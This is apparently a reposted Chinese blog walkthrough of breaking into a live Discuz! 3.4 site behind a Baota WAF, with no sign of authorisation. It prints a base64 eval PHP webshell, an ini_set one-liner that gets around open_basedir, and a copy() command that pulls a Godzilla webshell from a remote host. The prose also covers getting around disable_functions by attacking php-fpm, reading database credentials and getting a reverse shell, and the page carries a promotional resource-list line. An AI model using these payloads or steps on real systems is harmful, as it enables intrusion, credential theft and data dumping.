天天看點

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

作者:是白帽不是黑帽

這次滲透的主站是 一個 Discuz!3.4 的搭建 違法招 piao 網站, 配置有寶塔 WAF

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

用 Discuz!ML 3.X 的漏洞進行攻擊,但是沒有成功

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

發現主站外鍊會有一個發夾網,引導人們來這充值,是 某某發夾網,而且域名指向也是主站的 ip,兩個網站在同一個 ,此處忘記截圖了

網上有通殺 payload,寫 shell 的過程在這裡省略了

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了
【一>所有資源擷取<一】1、網絡安全學習路線 2、電子書籍(白帽子)3、安全大廠内部視訊 4、100 份 src 文檔 5、常見安全面試題 6、ctf 大賽經典題目解析 7、全套工具包 8、應急響應筆記

由于網站存在寶塔 WAF ,寫入 shell 必須變形一下,将指令進行 base64 編碼在傳進去

<?php @eval(base64_decode($_POST['yanshu']));?>

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

在 phpinfo()裡可以看到,寶塔預設會設定 open_basedir 以及 disable_functions,導緻蟻劍的 shell 直接連接配接之後不大好用,指令執行不了

繞過 open_basedir 檢視檔案

利用 ini_set() 來 bypass open_basedir 來擷取路徑名和目錄内容,base64 編碼之後執行,發現寶塔目錄下還有其他站點目錄

eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/www/wwwroot'));");

           

複制代碼

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

哥斯拉管理 webshell

為了友善檢視檔案 ,使用哥斯拉馬,加密器選擇 PHP_EVAL_XOR_BASE64,用 copy 指令傳到伺服器中,這樣流量就可以不會被寶塔 waf 攔截了

copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

哥斯拉馬可以自動實作 bypass openbase_dir ,讀取資料庫 使用者名密碼,可以更改管理者使用者進背景或者脫庫

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了
網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

繞過 disable_functions 執行指令

disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函數,環境是 php5.6,導緻很多正常 bypass 的方法都用不了

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

網站是使用 nginx+php5.6 ,用攻擊 php-fpm 的辦法來 bypass,攻擊原理可以看 參考連結

先找到 php-fpm 的配置 如:/www/server/php/56/etc/php-fpm.conf

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

或者看 nginx 的配置 ,得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

首先 選擇 PAttackFPM 将子產品加載并執行

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

再利用哥斯拉馬中 bypass disable_functions 的子產品 ,成功執行指令

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

擷取反彈 shell ,可以進一步嘗試對主機進行提權了

網絡安全:繞過 MSF 的一次滲透測試,學這一篇就夠了

繼續閱讀